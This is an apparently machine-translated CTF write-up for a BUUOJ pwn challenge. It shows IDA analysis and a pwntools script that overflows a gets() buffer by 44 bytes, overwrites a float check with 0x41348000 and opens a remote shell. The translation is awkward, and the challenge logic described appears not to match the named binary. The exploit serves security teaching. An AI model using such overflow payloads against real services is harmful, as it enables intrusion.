One 、 see file

First file ./warmup_csaw_2016 Check the file type and then checksec --file=warmup_csaw_2016 Check the file protection .

Two 、IDA Decompile

After decompilation, it seems that it is different from the previous questions
It seems that there is a function that is suspicious ：

double-click func() Function to view the source code, you can see when v2 = 11.28125 There will be a system call .

View assembly code double click cs:dword_4007F4 You can see 11.28125 In memory 16 The base number is represented by 0x41348000.

View stack structure , here var_30 yes v1, and var_4 yes v2, need (0x30-0x04)=44 A byte can overflow the stack , Finally, fill in 11.28125 The corresponding hexadecimal number 0x41348000.

3、 ... and 、 Code

from pwn import *
# remote() Establish a remote connection , To specify ip and port
io = remote('node4.buuoj.cn', 26965)
payload = b'a'*(0x30 - 0x4) + p64(0x41348000)
io.sendline(payload) # send data 
io.interactive() # And shell Interact 

summary

Or a stack overflow problem , We found two variables in that suspicious function ,v1,v2, Only one v1
Can pass gets（） Function input , But the condition of our judgment is v2=？？ a number , We will make changes as follows v2
Is it worth it , The answer is through v1 The overflow changes v2 In the value of the .